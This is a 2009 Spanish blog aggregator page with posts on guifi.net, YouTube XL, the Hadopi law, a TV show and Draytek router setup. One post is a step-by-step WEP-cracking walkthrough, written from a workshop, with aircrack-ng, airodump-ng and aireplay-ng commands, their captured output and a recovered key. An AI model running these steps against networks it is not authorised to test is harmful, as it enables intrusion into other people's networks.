Genial el cómic con el que me he topado, interesentísimo, ¿cómo conseguir mas comentarios en tus post?

traducción:
- Veinte dólares a que puedo hacer un envío que conseguirá más comentarios que uno tuyo.
- Claro.
Tres horas más tarde:
- Ja, ja, ja. ¡93 comentarios! ¿Qué te dije?
- El mío tiene 834.
- ¡¿Qué?! ¡¡¡Eso es imposible!!!
- Mi noticia incluye animalitos, a Chuck Norris, Software Libre, Bacon, Ron Paul, la crisis, Epic Fails, cinismo, a Apple y a un jodido Narval. ¿Cómo cojones hiciste para ganarme?
- Puse un error ortográfico en el título.

Sacado de www.thedoghousediaries.com

Blackhold: Youtube XL

noreply@blogger.com (Blackhold) — Fri, 05 Jun 2009 01:00:33 +0000

La primera vez que vi a un VJ pinchando con videos del youtube, simplemente flipé. Desde entonces el uso que le he dado a youtube ha sido un poco mayor. ¿Qué mejor sitio para encontrar toda la musica que quieres al alcance de tu mano?

Ahora youtube nos sale con otro formato, después de los vídeos en HD (720px) y los vídeos panorámicos, youtube nos deleita con una adaptación de su página para televisores (tal como lo ha echo anteriormente para ipods, symbian y otros).

Este nuevo formato permite navegar fácilmente con un mando a distancia y permite también la introducción de texto, así que adquirir un televisor con conexión a internet, una consola que permite la navegación de páginas web o usar un mediacenter no es del todo mala idea :)

Cabe destacar en la configuración que puedes decirle que reproduzca los vídeos de la búsqueda unos después de otros y ocultar los vídeos que no sean aptos para menores.

Podéis acceder a youtube XL desde www.youtube.com/xl

Irreflexiones de un demente: H&M apoya la campaña contra las drogas

noreply@blogger.com (Bermus) — Mon, 01 Jun 2009 14:24:52 +0000

Leo en la web de HyM:

HyM apoya y dona dinero a la organización internacional Mentor. La organización se dedica a la prevención del uso y abuso entre niños y jóvenes de todas las sustancias perjudiciales y que crean dependencia, tanto drogas legales como ilegales. El trabajo se centra en identificar los métodos más prometedores y contrastados para la prevención del uso de drogas y, acto seguido, difundir los conocimientos adquiridos a las organizaciones que trabajan de manera directa con niños y jóvenes en zona de riesgo. Mentor colabora, entre otras, con la organización mundial de la salud WHO.

Claro, deben usar sus trabajadores como conejillos de indias, por que tanta hipocresía, por Dios...

Es como cuando Mc Donalds nos vende ensaladas y nos dice que su comida es sana

Yoire.com: [Blogs] [Video] La cultura es tu sistema operativo

Tue, 26 May 2009 10:05:33 +0000

http://www.youtube.com/watch?v=YvdMN6VIXf4

Y cuanta razón!

Blackhold: Entrevista con Ramon Roca

noreply@blogger.com (Blackhold) — Sat, 23 May 2009 02:01:49 +0000

Esta tarde he tenido una entrevista en Olot con Ramon Roca, uno de los creadores de guifi.net.

Actualmente trabaja como técnico en Oracle y me ha dado un interesante link dónde encontrar toda la información de la adquisición de sun por parte de Oracle (ya que ellos tienen prohibido revelar ninguna situación de la empresa). Según la página a Oracle le interesa de sun el hardware. Además no se teme por el cierre de ninguno de los proyectos que ya estaba desarrollando sun, ni siquiera el mysql, se supone que mysql es una perfecta alternativa a mssql y permite así competir con el gigante azul.
Por otra parte el proyecto openoffice se encuentra un poco parado pero sólo hace falta un empujoncito ;)

Ramon Roca (ahora presidente de la asociación), en su tiempo libre ha ido creando junto con otros voluntarios (primero de Gurb, su población natal junto con Vic, Sta. Eugènia, Calldetenes (entre otras) y mas tarde de gente de todo Cataluña) la red wifi mas grande del mundo.
Durante un tiempo se fué a vivir a Barcelona por cuestiones de trabajo, pero se aborreció de la gran ciudad y decidió volver a casa, pero al volver se encontró con la problemática que no le llegaba internet a casa, así que junto un amigo crearon un primer enlace por casa de otra persona y así empezó el proyecto que se fué extendiendo primero por las masías de la zona por la necesidad de los payeses de conectar sus máquinas a internet y actualmente por todo Cataluña, que tiene en el instante de escribir este post 6.777 nodos operativos y 2.552 proyectados, siendo el proyecto de redes wifi con mas nodos de todo el mundo.

El motivo de la entrevista fué para comentarle el guión de la mesa redonda que se realizará el domingo 19 de Julio dentro del marco del Summer Camp Garrotxa a partir de las 11-12 de la mañana.

Esta mesa redonda quiere tratar la problemática del estrecho espectro de las redes wifi (2,4GHz y 5GHz), como conseguir ampliarlos (usando frecuencias que pronto quedarán vacías, como la de la televisión analógica o otras que no se usan), el entramado tecnológico que hay detrás de internet (empresas y organismos públicos), los derechos que tienen los usuarios a la hora de acceder a las redes que crean ayuntamientos o a la creación de sus propias redes públicas.
La mesa redonda puede ser un poco amplia pero con ella se quiere conseguir un nuevo frente de lucha para la neutralidad y la expansión de la red (la cual cada día estamos mas enredados).

Para ello tendremos entre nuestros participantes a gente relacionada con el mundo de las redes y redes wifi.

La entrevista con Ramon ha sido realmente interesante, he aprendido alguna que otra cosa, los planes de futuro de guifi.net (los cuales se explicarán en la mesa redonda), que 1Mbit de conexión simétrica sólo cuesta en realidad 40céntimos!, como crear tu propio ISP, el coste del cable de fibra óptica (800€/km aprox.) y las posibilidades de tirarlo uno mismo.

Curiosamente pocas horas mas tarde, en otra ubicación mi padre ha asistido a una charla que se hacía a los gestores de fincas de esta otra población (esta es una población de segundas residencias y mucha gente se encuentra con la problemática de la dependencia de internet y para mucha gente es poco viable contratar una ADSL sólo para lo que dura el verano).

La charla la daba el secretario de guifi.net Lluís Dalmau (otro de sus creadores), además de David Puig (regidor delegado de Platja d'Aro wifi). Por ahí también teníamos a knoppix (un saludo).

Mi padre (ingeniero técnico mecánico, usuario de nivel medio-alto y una hija friki-informática) me ha comentado que toda la gente que se encontraba ahí era mayor que él (con un tono burleta -actualización: en las fotos había alguno mas joven que él xD-) y que la charla ha estado bien porqué contaban como funcionaba técnicamente guifi.net.
A esta gente, de entre 50 y 60 años mayoritariamente, pero, poco les interesaba como funcionaba la red, muchas de las cosas que les comentaban les sonaba a chino, ellos sólo estaban ahí para saber si aquello les iba a costar mucho dinero o no y si iba a funcionar para siempre.

Esta es una postura normal, la gente sólo mira por su bolsillo, pero si a la gente les explicas la problemática de que los ayuntamientos pagan ADSL con el dinero de todos y que luego los ciudadanos no pueden usarlas porqué estas son cerradas y para uso interno, o que lo que les están cobrando los otros ISP es una burrada y que hay una alternativa mucho mas económica y totalmente funcional, esta puede agarrar tu proyecto de una forma mas social y menos económica, sólo hay que aprender a venderse.

Muchos de los que estamos en proyectos libres lo hacemos porque queremos, no esperamos nada a cambio y si lo hay es gratificado aunque sea poco, ya tenemos nuestro trabajo y hacemos cosas de estas para evadirnos o simplemente por los demás, por puro altruismo.

El Software/Hardware/Red libre no puede entenderse desde una mente capitalista.

Blackhold: Crackeo de redes wifi con WEP

noreply@blogger.com (Blackhold) — Sat, 23 May 2009 00:50:40 +0000

Hoy nos encontramos con la gente de aptitude entre ubunteros en la party que se ha celebrado en el IES Copernic de Terrassa.

Una de las charlas/taller que he asistido ha sido la de crackeo de redes wifi, para esto os dejo este pequeño artículo.

Para crackear wifi con wep vamos a usar lo siguiente (partimos que tenemos una red wifi que permite levantarse en modo monitor).

# airmon-ng start wlan0

esto te crea un interfaz virtual llamado mon0 conectado en modo monitor, necesario para hacer la inyección de paquetes

para bajar este interfaz simplemente escribiremos lo siguiente:

# airmon-ng stop mon0

en principio cuando reiniciamos esta interfaz virtual no se creará y deberemos crearla cada vez que queramos realizar un escaneo.

# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11abgn ESSID:"coperWifi"
Mode:Managed Frequency:2.442 GHz Access Point: 04:21:91:93:72:10
Bit Rate=1 Mb/s Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality=42/100 Signal level:-76 dBm Noise level=-93 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

vmnet1 no wireless extensions.

vmnet8 no wireless extensions.

mon0 IEEE 802.11abgn Mode:Monitor Frequency:2.442 GHz Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

La siguiente fase será ejecutar el analizador de redes inalámbricas airodump-ng

Para ello crearemos un directorio

# mkdir /home/laura/wifi && cd /home/laura/wifi

y iniciaremos el analizador de redes:

# airodump-ng -i mon0 -w captura.cap

con esto podremos ver las wifi disponibles, con -i indicamos la interfaz de captura, con -w el nombre del fichero.

empezará a salir en pantalla una lista de las redes disponibles, si usamos -c podremos definir el canal que queremos analizar.

CH 11 ][ Elapsed: 4 s ][ 2009-05-09 13:19

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:21:91:93:72:0A -85 1 1 0 1 54e. WPA2 TKIP MGT eduroam
04:21:91:93:70:93 -82 0 1 0 1 54 . WPA TKIP PSK coperWifi
00:21:91:93:72:00 -87 1 1 0 7 54e. WPA2 TKIP MGT eduroam
00:01:38:8E:2E:42 -83 2 0 0 4 54 . WEP WEP WLAN_67
04:21:91:93:72:10 -76 3 1 0 7 54e OPN coperWifi
04:21:91:93:72:0A -84 1 0 0 1 54e. OPN coperWifi
00:21:91:93:70:93 -82 0 1 0 1 54e. WPA2 TKIP MGT eduroam
00:15:F2:D0:67:25 -80 1 0 0 11 54 WEP WEP Jazztel Jordi

00:80:5A:4B:88:87 -35 8 1051 179 11 54 WEP WEP WLAN_205

BSSID STATION PWR Rate Lost Packets Probes

04:21:91:93:72:10 00:13:46:E9:FF:AC -40 0 - 2 0 1
(not associated) 00:1C:F0:D4:53:A9 -71 0 - 1 0 1
(not associated) 00:12:F0:D4:4B:57 -44 0 - 1 161 45 coperWifi
(not associated) 00:13:CE:4D:B6:E4 -41 0 - 1 187 40 coperWifi
00:80:5A:4B:88:87 00:1C:F0:D4:54:A8 -36 0 - 1 832 1465

El campo que nos interesará será el #Data, y la red wifi con la que estamos haciendo las pruebas es la WLAN_205. Si paramos la captura, podemos seguirla en otro momento sin perder los datos ya capturados.

Pero en un ambiente no hostil, nos encontramos que el numero de paquetes que puede recibir un AP sea bastante bajo, a menos que el usuario tenga la brillante idea de usar algun programa de descarga por wifi.

Para generar tráfico para que lo podamos analizar y encontrar la clave WEP, será necesario ejecutar el aireplay-ng, pero antes deberemos comprobar que nuestra tarjeta de red permite inyectar paquetes.

# aireplay-ng --test -i wlan0 mon0

Si todo es correcto seguimos con el aireplay-ng:

# aireplay-ng -1 0 -e ESSID -a BBSID mon0

-1 el ataque 1
-e ESSID: definimos el nombre de la wifi la cual queremos inyectar los paquetes
-a BBSID: la mac del AP el cual queremos inyectar los paquetes
mon0: nuestra interfaz en modo monitor

Ahora una vez asociados inyectaremos los paquetes:

# aireplay-ng -3 -e ESSID -a BBSID -x 500 mon0

Si vemos que no se inyecta tráfico vamos a cambiar el valor de -x

Una vez capturados los paquetes queda hacer el crack de la clave

# aircrack-ng -x -0 *.cap *.ivs

A continuación nos sale una lista de las wifi capturadas, en nuestro caso será la primera. Dependiendo del numero de paquetes capturados va a tardar mas o menos en crackear la clave, con 52000 paquetes, el crackeo ha sido en unos pocos segundos, además de que la clave no es muy larga:

Aircrack-ng 1.0 rc3

[00:00:00] Tested 11 keys (got 34498 IVs)

KB depth byte(vote)
0 0/ 1 78(51968) 31(42752) AF(42240) A0(41984) 2F(41472) 01(40960) 67(40192)
1 0/ 1 6D(53504) 76(41216) 74(40960) 28(40704) 42(40448) 7E(40448) 61(39936)
2 0/ 3 75(45824) 76(42496) CC(41728) A7(40704) BC(40704) 2A(40448) 53(40448)
3 0/ 1 5B(50688) CB(43008) 70(42496) 53(42240) 80(41472) 22(40960) 39(40960)
4 2/ 4 16(42240) E3(41472) 52(40704) CC(40704) 24(40448) 7B(40192) 4D(39936)

KEY FOUND! [ 78:6D:75:5B:2E ] (ASCII: xmu[. )
Decrypted correctly: 100%

Ahora con la wep resultante la guardamos y la podremos usar cuando la necesitamos.

Actualización: no es posible inyectar paquetes si tu red wifi no lo soporta.

Blackhold: Escenas Censuradas en los Simpson

noreply@blogger.com (Blackhold) — Wed, 20 May 2009 20:26:54 +0000

Y para acabar el día de hoy algunas escenas de los simpson que han sido censuradas, porqué vivimos en un país libre y sin tabús! (visto en desdemilugar)

Blackhold: se cierra una puerta, se abre un portal

noreply@blogger.com (Blackhold Clon) — Wed, 20 May 2009 17:26:57 +0000

Pues bueno, han sido 3 interesantes años y medio en mi anterior empresa, he aprendido muchísimo de y con mi anterior responsable, al cual le agradezco el tener que soportarme día a día y el trabajar codo con codo para ofrecer el mejor servicio a nuestros usuarios.

Gracias a él he aprendido también a tener una mente más crítica (que el mundo del software libre está muy bien, pero en una empresa se busca la efectividad y a veces las herramientas libres que tenemos a mano no cubren todas las necesidades o a tal como estamos acostumbrados, pero hay que intentarlo), en no perder nunca la noción de un proyecto mediante el uso del método científico que tan absurdo encontraba cuando me encontraba en bachillerato, ¡ah! y sobretodo ¡y a leerme el manual de las cosas antes de usarlas! ;)

Pero todo lo bueno termina.

Parece que la crisis ha afectado también a mi ex-empresa y son necesarios algunos reajustes y las personas que se pueden sustituir por servicios externos terminan en procesos de destrucción de empleo (esto supongo que implicará que empresas de servicios tengan mas trabajo).

Como dicen cuando se cierra una puerta de abre un portal.

A partir de ahora estoy disponible para quien me quiera contratar por un puesto relacionado en administración de sistemas bajo GNU/Linux e implantación de herramientas libres en la zona de Barcelona ciudad.

Tomad este blog como referencia de mis conocimientos, ya que este es mi bloc de notas y mi libro de ensayos.

Blackhold: iUnika

noreply@blogger.com (Blackhold) — Fri, 15 May 2009 20:18:59 +0000

iUnika es una compañía global dedicada a la fabricación y distribución de hardware informático y al desarrollo y ensamblamiento de Software Libre.

De reciente creación, sus fundadores son los empresarios madrileños Ángel Blázquez y Pablo Machón, que han canalizado la experiencia acumulada en el sector informático desde hace dos décadas para desarrollar un proyecto empresarial con un marcado carácter tecnológico, pero, al mismo tiempo, dotado de una profunda conciencia social y medioambiental.

En iUnika la libertad es lo primero. La libertad entendida como el respeto a las libertades individuales de los usuarios, pero también como el camino hacia la democratización y universalización de la tecnología informática a través de equipos con precios accesibles.

Actualmente, la actividad de iUnika se desarrolla entre China, donde fabrica sus equipos bajo la dirección de expertos tecnólogos de origen japonés y taiwanés; Hong Kong, donde tiene las oficinas centrales; y Madrid, donde realiza el desarrollo de software y cuenta con un laboratorio (en Miraflores de la Sierra).

iUnika es el primer y único fabricante de hardware informático del mundo que se ha comprometido a utilizar exclusivamente Software Libre en todos sus productos.

Los primeros equipos desarrollados por iUnika se enmarcan en la categoría de los UMPC (Ultra Mobile Personal Computer) y son ordenadores mini-pc portátiles, ultraligeros (700 gramos de peso), que incorporan un sistema operativo completamente libre (GNU/Linux) con miles de programas de Software Libre. ... leer más

Por sus características, se trata de un equipo único en el mercado: es ecoeficiente, 100% libre, de tamaño reducido y, a pesar de su bajo coste (se comercializará a partir de 130 euros), no descuida el diseño y ofrece una estética atractiva.

La carcasa de los mini-pcs iUnika está fabricada en bioplástico, un material respetuoso con el medio ambiente, ya que se obtiene a partir de recursos renovables de origen natural, como el almidón, la celulosa o la harina de maíz y, por tanto, son totalmente biodegradables.

Los mini-pcs iUnika Solar tienen un mayor componente ecológico que los otros modelos, puesto que incorporan en su carcasa placas solares que permiten completar la carga de las baterías con un recurso limpio e inagotable como el sol, incrementando la autonomía del equipo más allá de las cuatro horas.

El modelo iUnika GSM responde a la demanda de un perfil de usuarios en crecimiento, como es el de aquellos que conceden vital importancia a la movilidad y a la conectividad. El ajustado tamaño (23x16 cm.) y el reducido peso (700 gramos) convierten a iUnika en un portátil muy cómodo para el usuario.

Ficha técnica

Tipo de ordenador UMPC (Ultra Mobile Personal Computer)
Sistema operativo GNU/Linux
Procesador Mips
Marca procesador Ingenic
Velocidad del procesador 400 Mhz
Memoria RAM 128 Mb
Almacenamiento hasta 64 Gb
Almacenamiento externo SD
Tipo de disco duro Flash
Capacidad del disco duro 1 Gb
Puertos USB 3 extensibles
Acceso de red ADSL, Wifi, CDMA, GPRS (opcional)
Tamaño de la pantalla 8 pulgadas
Resolución máxima 800 x 480
LAN 10/100 Ethernet Interface
Peso 700 gramos
Medidas 23 x 16 centímetros
Mini pantalla LCM

Blackhold: Hadopi : des effets indésirables?

noreply@blogger.com (Blackhold) — Fri, 15 May 2009 17:59:19 +0000

Según el blogger francés Korben, Orange Francia ha hecho desaparecer un interesante artículo donde se analizan los efectos negativos que tendrá la ley Hadopi (y similares) de su propia Web. Gracias al caché de Google el documento aún puede leerse en:

Sacado de la caché de google

El texto habla sobre el uso de las redes VPN encriptadas, ya que estas serán mas difíciles de analizar, además de que casi la totalidad de las empresas usan redes VPN para comunicar sus cedes y que muchas de estas no permitirían el análisis de sus VPN.
Por otra parte la NSA está en contra de la prohibición de las redes P2P porqué esto implicará el aumento del uso de túneles VPN encriptados, lo que implicará un coste mayor a la hora descifrar los datos a analizar en búsqueda de ataques terroristas y demás cosas chungas.

mise au point : une version antérieure de cet article a été reprise par d'autres sites sous un titre ne reflétant pas mon opinion exprimée dans ce post. J'ai donc pris la décision de le publier à nouveau en changeant quelques termes dont l'imprécision pouvait prêter à confusion, sans pour autant changer le sens de mon texte. Afin de vous permettre de visualiser les passages que j'ai modifiés, ces derniers ont été mis en gras.

Après notre article sur certaines difficultés techniques un peu oubliées liées à la mise en place de la nouvelle loi Création et internet dite Hadopi, et puisque maintenant c'est (presque) fait, la loi étant votée, nous pouvons donc vous dire en exclusivité quel sera le plus danger de cette loi. Loin de nous l'idée de rentrer dans la polémique, ce n'est pas le genre de la maison. Il existe sur Internet à l'heure actuelle pas mal de scénarios de politique fiction sur le futur d'Hadopi. De la loi, nous ne sommes pas devins, nous n'en parlerons pas, par contre de ses conséquences certaines à moyen terme, oui.

Commençons par nous intéresser aux différents protocoles circulant sur Internet. A l'heure actuelle, la plupart des communications circulent en clair utilisant un nombre impressionnant de protocoles. Les communications utilisant le chiffrement sont assez restreintes dans leur utilisation, pour les particuliers les sites e-marchands, bancaire ou éventuellement gouvernemental (impôts par exemple), les entreprises utilisent de plus en plus elles aussi Internet pour communiquer via des VPN chiffrés entre agences. Le reste des communications chiffrées, et bien ceux qui ne veulent pas que leur communications soient « écoutés » (pour diverses raisons, mais principalement aujourd'hui illégale en majorité, ce qui peut les rendre « simple » à repérer) ou veulent rester anonymes. Voici le macro paysage d'Internet, qui comme nous le voyons est difficilement contrôlable, mais le contrôle des flux pour soit reconnaitre le terrorisme, la pédophilie, ou le téléchargement illégal reste possible techniquement.

Que va-t-il se passer après le passage de la loi ? Inutile d'avoir une boule de cristal... La mutation est en cours... D'un nombre important de protocoles utilisés, nous allons tomber à environ ... deux (ou presque). Le http standard et sa version SSL. Le premier servant rapidement à passer au second pour que le contenu reste non connu de tous. Vous allez donc me dire le P2P va disparaitre, et c'est le but de loi, donc la loi est bonne. Oui, vous avez raison, le P2P tel que nous le connaissons aujourd'hui va progressivement disparaitre, mais pas l'échange de fichiers illégaux, la nuance est importante. Le fait de chiffrer ses communications va favoriser l'explosion (pour les puristes cela existe déjà)de nouvelles (ou anciennes)formes de communications. En ce qui concerne, par exemple l'échange de fichier, des logiciels d'échange travaillant sur SSL, des serveurs de fichiers centraux type rapidshare ou megaupload offrant une option HTTPS à leurs clients, des fournisseurs de news offrant une connexion SSL (pour la plupart c'est déjà fait). Le bon père de famille va prendre l'habitude de chiffrer toutes ces données même de messagerie grâce à des logiciels toujours plus puissants et de plus en plus faciles à utiliser, avec en plus un recherche d'anonymisation plus forte grâce à des réseaux de type TOR ou I2P encore plus faciles d'accès.

Mais vous parliez d'effets indésirables dans votre titre, encore un, en trompe l'œil ?

Peut être pas, le risque serait, en fait pour ... la société elle même, et dans une moindre mesure pour les fournisseurs d'accès Internet, et les entreprises. Pourquoi cela ? les communications très majoritairement chiffrées vont faire passer l'état d'Internet de difficilement contrôlable à totalement incontrôlable, apprécier la nuance.

Les spécialistes de contre terrorisme cybernétique ou contre pédophilie cybernétique pourraient ne plus être à même d'effectuer correctement leur travail. Avant, comme nous l'avons vu seuls certains chiffraient leur communication, après que l'on est écarté les entreprises, les sites bancaires et e-marchand, il ne restait pas «grand monde » à vérifier, maintenant que toutes les communications sont cryptées, comment séparer le bon grain de l'ivraie ? Impossible. D'ailleurs, comme vous le savez, chaque pays a en projet une loi similaire à Hadopi. Les Etats-Unis en sont un exemple, mais à cet instant ce type de projet est écarté, ni par des associations de consommateurs, ni par les artistes.... Non, non.... Par la NSA tout simplement, qui a tout de suite vu le danger de dérapage du tout chiffré (ils avaient déjà des problèmes avec Skype pour la même raison, alors généraliser le chiffrement pas question) pour les problèmes de sécurité intérieure non maitrisée. A méditer. L'impact sur les entreprises pourrait être un peu plus insidieux, en effet, ne pouvant plus rien contrôler les FAI devront tout laisser passer, adieu la qualité de service sur Internet maintenant balbutiante et bientôt morte.

Según sisgu: El Hermano Mayor

noreply@blogger.com (sisgu) — Fri, 15 May 2009 16:40:55 +0000

En el show, presuntamente educativo, "El Hermano Mayor", que emite la cadena CUATRO los viernes en primetime -a eso de las 22:00- en la edición del 15 de mayo presentan el caso de un joven, Jaume, menor de edad que... "fuma muchos porros".
Dan a entender que todos sus problemas, no estudia, no trabaja, se levanta tarde, consume unos 9 porros diarios, conduce motos de forma temeraria (haciendo caballitos), coge dinero en casa, etc... son a causa de sus "hábitos cannabicos".
"El Hermano Mayor" es, según sus propias palabras, un "adicto recuperado" que empezó con porros a los 16 y terminó adicto a la coca entre otras sustancias a los 34.
¡Bien! ¡Buen Ejemplo!
Un chamán, uno que ha vuelto.
Alguien que con su sola presencia nos demuestra que no todo está perdido.
Al final, como no podía ser de otro modo, las cosas terminan bien "Happy End" justo al acabar el capítulo. Supongo que en un par de meses o tres harán un breve, un capítulo de seguimiento con dos o tres "casos exitosos".
¡Misión Cumplida!
¿Droga? Mala, mala, maaaaaaaaaaaaaaaaaala!!
¿No consumir ni siquiera una pizquita? Bueno, bueno, bueeeeeeeeeeeeeeeeeeeeeno!!
Lo hacen de forma muy completa. No se privan de llevarle a un cementerio, como si todos y todas no fuéramos a morir algún día, fumemos o no porros. Presentan a un médico de una clínica de desintoxicación que dice lo mala malísima que es la María y que "no tiene efectos terapeúticos", así, como suena.
También sale todo un señor policía de la unidad de narcóticos que explica que "es delito plantar una semilla", y lo dice y se queda tan fresco. Me temo que será una manipulación del programa porque no me puedo creer que todo un profesional del tema pueda decir eso... a no ser que luego añada: "salvo para autoconsumo", palabras oportunamente cortadas del reportaje. "No dejes que la verdad te estropee un buen plano", "No contarlo todo no es exactamente mentir" y justificaciones por el estilo.
Espero que todo esto sea verdad, bueno, toda la verdad que puede ser la tele, y que no haya otra forma de tratar ciertos casos de "abuso" que la de no consumir ni siquiera un poco, de "ni olerlo", de "ni poder tocarla" como hace, muy teatralmente el Hermano Mayor cuando tiene que requisarle la droga.
Quizá lo ideal fuera no dejar que las cosas llegasen a ese punto. Entender que el adolescente está bastante confundido ¿cuál no? y que su relación con la María es "uno de sus 'problemas'" NO la causa de todos ellos.
La gente debería saber que hay sustancias poderosas, el alcohol, la pólvora, el acero, el petróleo, el azucar... el THC, y para tratar con ellas hay que ser equilibrado, tener fuerza y coraje. Aprender a no comer todos los chuches que quisiésemos o a no conducir a la velocidad máxima que pueda alcanzar nuestro coche.
No hace mucho alguien me ofreció probar un vaporizador, yo ya había comido media pasta y luego comería un poco de bizcocho y un tiramisú delicioso, ante la duda, no soy consumidor habitual sino muy muy esporádico, preferí decir que no.
El valor no está sólo en atreverse sino en, si no lo ves claro, si como recomendaba Sunzi: "no te conoces a ti mismo ni conoces a tu 'enemigo'..." evitar la ocasión, ser prudente es también una prueba de fortaleza y de equilibrio.
Cuando alguien busque un único chivo expiatorio, que sea la causa de nuestros problemas, que simplifique todo en el falso maniqueísmo de bueno/malo
¡Cuidado!
Probablemente, como pasa actualmente con ciertas sustancias satanizadas desde el poder y llamadas: drogas, alguien quiera manipularte e imponerte un "pensamiento único".
¡Disiente!
¡Piensa por ti mismo!

)S(

Blackhold: Draytek Vigor 2710Vn - NAT y DHCP

noreply@blogger.com (Blackhold) — Sat, 09 May 2009 16:27:20 +0000

Lo siento planetas, hoy os llenaré las páginas, pero estoy creando el ecosistema, no tengo explicación alguna pero la red va mucho mas suelta, mis conocimientos de redes son bastante limitados :(

Nos encontramos que tenemos unos equipos que sirven ciertos servicios hacia el exterior, básicamente he dejados configurados el http, el ssh y el gobby.

Primero de todo entraremos en el router (por defecto la ip del gateway, dónde dirigimos nuestros paquetes).

En NAT > Port redirection tenemos una lista de ip y puertos, en la imagen un ejemplo de mi configuración con los 3 servicios mencionados.

Os presento a los 2 equipos que participan en el ejemplo, urbanita (mi ruidoso y viejuno ordenador de sobremesa) y sofre (el lenovo thinkpad x200 protagonista en otros posts).

urbanita hemos configurado 2 servicios el http (puerto 80 tcp) y el ssh (el 22 y el 443 apuntando al 22). El porqué acostumbro a redirigir el puerto 443 al 22 es porque a veces te encuentras en wifis publicas y tienen fuertes restricciones, los puertos 80 y 443 siempre están abiertos, para poder navegar por http y https, como no tengo instalado un https en mi equipo aprovecho este puerto, luego mediante túnneles ssh puedo tener a mano cualquier servicio usando la conexión ssh como proxy.

Si pulsamos a uno de los numeros podemos acceder a la configuración de la redirección NAT:

En la imagen tenemos la configuración numero 3, la que tiene la redirección a un puerto distinto por la parte pública y la privada.

En Mode podemos definir si es una redirección de un solo puerto o de varios. En service name definimos un nombre identificativo para aquella entrada. En el protocol el protocolo TCP o UDP a usar, si usamos --- será como decirle ambos. En WAN IP en qué red virtual permitimos esta redirección (ya que el router permite hacer redes virtuales). Public port, el puerto exterior al que nos conectaremos (el 99% de las veces el puerto interno y el externo son los mismos). Private IP, qué máquina nos está ofreciendo el servicio. Private port, el puerto interno del servicio.

Si estamos usando un servicio el cual no sabemos el puerto mediante un netstat lo podemos ver:

# netstat -lanp |grep LISTEN

Una vez configurado será importante marcar Enable para habilitar este perfil.

Otra entrada la cual me introducirá a la parte del DHCP es la numero 4, dónde tengo el portátil conectado por wifi y compartiendo el servicio gobby.

Como todo servidor DHCP medio decente, podemos asignar ip a direcciones MAC, para cuando estos interfaces se conecten a la red puedan hacerlo de forma dinámica y se les asigne siempre la misma IP.

Para ello en LAN>Bind IP to MAC, definiremos qué IP servirle a una MAC cuando se conecte:

A la parte izquierda podemos ver los equipos que se han conectado a nuestra red, en mi caso he definido que el DHCP sirva IP a partir de la IP 192.168.1.10, dejando de la 2 a la 9 para los distintos equipos que usan la red (como el segundo AP, el NSLU2, la impresora o mi servidor principal).

A la parte derecha tenemos las definiciones, bastará con pulsar 2 veces sobre una conexión ya establecida o definirla manualmente en la parte inferior del formulario.

Cabe destacar la existencia de la regla strict bind, que tal como dice, en este modo sólo se permitirá la conexión a la red a aquellos equipos que se encuentren identificados en esta lista.

Finalmente, si vamos a LAN > General Setup, podremos configurar el comportamiento del servidor DHCP y a partir de qué IP empezar a servir o si tenemos un servidor DHCP interno en otra maquina hacer un relay hacía esta.

Blackhold: Draytek Vigor 2710Vn - VPN over IPSec

noreply@blogger.com (Blackhold) — Fri, 08 May 2009 23:36:36 +0000

Como una niña con un juguete nuevo e inevitable impulso ya estoy haciendo las primeras configuraciones y una de las primeras ha sido la de la VPN.

Los dos protagonistas son un router draytek vigor 2800 y el 2710Vn.

Por un lado al 2800 con la siguiente configuración:

y por el otro el 2710Vn con la siguiente configuración:

Voy a explicar un poco las secciones de ambos.

En la primera sección, common settings, vamos a definir el nombre del perfil que encontramos dentro de VPN and Remote Access > LAN to LAN de ambos routers, Enable this profile, el call direction a both para permitir conexiones de la VPN en ambos lados con el dial que mostraré después de la configuración, si queriésemos que la conexión siempre estuviese establecida deberíamos pulsar el always on que lo unico que hace es mantener un ping entre ambos routers o ips de la red interna.

En la segunda sección, Dial-out settings, definiremos la configuración de llamada.
En ella configuraremos el tipo de conexión que nos encontraremos al otro lado, vamos a usar la misma configuración en ambos.
En este caso estamos creando una VPN sobre IPSec (si usásemos otro tipo de conexión como PPTP, podríamos definir el nombre de usuario y contraseña) usando una pre-shared key (que la definimos en un pop-up), el uso de una signatura digital, además de la seguridad del túnnel IPSec.

En la tercera sección, Dial-in settings, tendremos que configurar esta sección con la configuración que esperamos de las llamadas VPN. Si no definimos ninguna ip, permitiremos que cualquier que sepa nuestra configuración de la VPN pueda conectarse a nosotros.
Si vamos siguiendo los cuadros, podremos definir también un nombre de usuario y contraseña para las VPN sobre PPTP, por ejemplo).
Podremos definir también la Pre-Shared key, la signatura digital y los métodos de seguridad de IPSec para encriptar un poquito el asuntillo.

Finalmente en la cuarta sección, TCP/IP Network Settings, definimos la configuración ip que esperamos de la red que se nos conectará a nosotros.
En las imágenes estamos usando las redes privadas 192.168.1.0/24 y 192.168.2.0/24, con la mascara de subred 255.255.255.0, pero podríamos abrir el abanico de subredes permitidas poniendo como redes privadas 192.168.0.0/32 usando como mascara de subred 255.255.0.0 y así succesivamente.
En RIP direction definimos que sea de ambos lados, además si queremos que todo el tráfico de la red saliente pase por el tunnel VPN creado, idóneo para centrar toda la información de las redes a una misma ubicación, altamente no recomendable a menos que tengas un buen tubo de salida a internet.

Una vez configurados ambos routers deberemos crear el túnnel VPN entre ambos routers, simplemente bastará en ir a VPN and Remote Access>Connection Management, en dial-out tool vamos a seleccionar la VPN que queremos conectar y pulsaremos al botón dial.

En unos segundos en la sección de abajo, VPN connection status, podremos ver como se conecta la VPN.

Si nos fijamos en el color de la conexión podremos ver si esta está cifrada o no, en la imagen ahora mismo la conexión no está cifrada, porque he definido una seguridad de IPSec media, si definiésemos una High (ESP) la conexión saldría de color verde, también implicaría que la conexión sería mas lenta, por ahí está servido el dilema ¿mas seguridad o mas velocidad?

